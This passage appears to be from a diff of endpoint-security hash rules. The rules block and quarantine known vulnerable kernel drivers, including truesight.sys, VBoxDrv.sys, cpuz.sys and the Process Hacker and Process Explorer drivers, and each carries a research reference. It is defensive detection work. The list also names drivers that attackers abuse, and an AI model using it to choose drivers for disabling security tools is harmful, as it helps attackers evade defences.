"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153771Z", + "creation_date": "2026-03-23T11:45:31.153773Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153779Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7a044042ef9cb8e015981ce8d1d9853340acf7414d7d18a3ab7e480edcd90349", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4ac3a019-1408-5e50-8d29-5a1e7d61a37d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143704Z", + "creation_date": "2026-03-23T11:45:31.143706Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143714Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8e391e12eb754d8cfe0e566c5ced36118048e963d8127e2333cd5fcb2f658622", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4ac4afb1-8bf5-54d4-9d77-90cb894dbd91", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608722Z", + "creation_date": "2026-03-23T11:45:29.608724Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608732Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8aeed1480e8c4dd4a26a6717fb274ba36054000acb49e8423c20b5f2ebb3851a", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4af69396-f7d3-5d50-861b-bb35b60df45b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813806Z", + "creation_date": "2026-03-23T11:45:31.813809Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813814Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "02b8d6e0d3669fee150cd0a79d5413eb8ed3fd3ab5e70329e7f488be40d1d8a8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4b0b3a7a-d721-5ad4-9dc8-3d732f42ad0e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819895Z", + "creation_date": "2026-03-23T11:45:30.819897Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819902Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7c8d7bb3a272afe7fb737bd165fe9bd8f8187f1835289eb66d471cdced74e950", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4b152d9b-6592-53e9-91b4-a2083e2e26d0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151160Z", + "creation_date": "2026-03-23T11:45:31.151162Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151168Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "281ae0003e98de2f4b1a10255142ee54631e04b2b8a30f4ef3014a00d98a04aa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4b16ac1e-ae9e-5d2c-a45f-0763597a1dd6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811292Z", + "creation_date": "2026-03-23T11:45:31.811294Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811299Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cf50b862cc00efe4bbf7a707d7eaf70657ec0f6f127d0d462248497d19cdc583", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4b177385-685d-50b7-8542-5806cc73b5a1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605304Z", + "creation_date": "2026-03-23T11:45:29.605306Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605311Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4c029ac703913ff22930856aaeaf992f18a602f282c001252a1a8172ecb0b766", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4b18c008-e0be-53cc-b712-bd8e6a86fab0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813914Z", + "creation_date": "2026-03-23T11:45:31.813916Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813923Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0ca73650cd34c9701d64c67d9416c5cebf077607d24e2dddd5d98af25a966a5f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4b20fba9-5f83-5d90-b3c2-4b6378790338", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489854Z", + "creation_date": "2026-03-23T11:45:31.489858Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489866Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "46bc64031ea94d3cd93b0d2dcb90c38e90bdd27b4ffe2fc74b56a82a139aa3f1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4b3438f9-d5a2-5195-9384-83a6e1f61284", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.820163Z", + "creation_date": "2026-03-23T11:45:31.820167Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820175Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c97c503b95faa2aa2a4f2345396f81716343bcba32f05ed0a17e2b722ca62157", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4b35bbc4-8e3b-5130-9c02-5dc9e8408b57", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481384Z", + "creation_date": "2026-03-23T11:45:30.481388Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481397Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "793a26c5c4c154a40f84c3d3165deb807062b26796acaae94b72f453e95230d5", + "comment": "Vulnerable Kernel Driver (aka phymem_ext64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} 
+{ + "id": "4b3a0e87-5892-5fa4-b12c-f92f788f0acb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606368Z", + "creation_date": "2026-03-23T11:45:29.606370Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606375Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1e9922ff0332701c81667b2f34538ded46f1f42c4638c22da3834f3d86452c27", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4b3fb118-81a4-5284-9bae-0e1af6952b42", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984105Z", + "creation_date": "2026-03-23T11:45:29.984107Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.984112Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8c748ae5dcc10614cc134064c99367d28f3131d1f1dda0c9c29e99279dc1bdd9", + "comment": "Vulnerable Kernel Driver (aka CupFixerx64.sys) [https://www.loldrivers.io/drivers/c98af16e-197f-4e66-bf94-14646bde32dd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4b42c871-ff82-5b0e-a97c-052198bba4a7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975711Z", + "creation_date": "2026-03-23T11:45:29.975714Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975723Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fcdf0eaf9c8effa2786c82e774974f1ef4098dcd376461bad37fd4168dcab52b", + "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4b51ff34-a070-5c0d-afbc-801b7f4e42f3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605102Z", + "creation_date": "2026-03-23T11:45:29.605104Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605109Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c7b1bb39dcd7f0331989f16fcc7cd29a9ae126bee47746a4be385160da3c5a29", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4b587255-617f-5ebf-9419-0811f20c50ad", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481204Z", + "creation_date": "2026-03-23T11:45:30.481206Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481211Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5dc477cc45e4c1421296373adef9f5795fb9f5035f1400c72bb37678ad7f8954", + 
"comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4b67b1f3-b108-5fe5-8bf5-657ec0f2523c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817444Z", + "creation_date": "2026-03-23T11:45:31.817446Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817452Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c4c934b9604efe82b1cdb01837be62bc392988c0a975fe3945865e7463a49950", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4b7105fc-3403-5c76-8a67-812f3382e625", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:31.810698Z", + "creation_date": "2026-03-23T11:45:31.810700Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810706Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "146b7aa22d47b0585c5f6a41b4ca8acff056d26fa62304675199195cd62a40c4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4b75725f-9d4a-5ce7-840b-84d7f0cc8fa0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813561Z", + "creation_date": "2026-03-23T11:45:31.813564Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813573Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "045ac1a3b28a774ae92fc318b0370d3426a5db7d942e5113897ede9ec85888a4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4b80c240-d123-5a8b-8047-f3850b64d962", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975956Z", + "creation_date": "2026-03-23T11:45:29.975958Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975964Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "251be949f662c838718f8aa0a5f8211fb90346d02bd63ff91e6b224e0e01b656", + "comment": "SystemInformer driver (aka systeminformer.sys, formerly known as kprocesshacker.sys) [https://github.com/winsiderss/systeminformer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4b81ff99-5324-5f0c-a0c5-ad2246319012", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491920Z", + "creation_date": "2026-03-23T11:45:31.491922Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491928Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c845b52bef8193d0187db0e1608f65807b46354fdd15a68fa2eca0a1462bcf2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4b92336f-68d4-5aff-98b2-64e1481e7a68", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456364Z", + "creation_date": "2026-03-23T11:45:30.456367Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456376Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0aff83f28d70f425539fee3d6a780210d0406264f8a4eb124e32b074e8ffd556", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4b9323ef-6313-597b-b1c3-222e2908f2a4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472531Z", + "creation_date": "2026-03-23T11:45:30.472534Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472543Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d0543f0fdc589c921b47877041f01b17a534c67dcc7c5ad60beba8cf7e7bc9c6", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4b9a7ee2-af18-5ca6-a77e-549b32760fc4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474769Z", + "creation_date": "2026-03-23T11:45:30.474772Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.474781Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
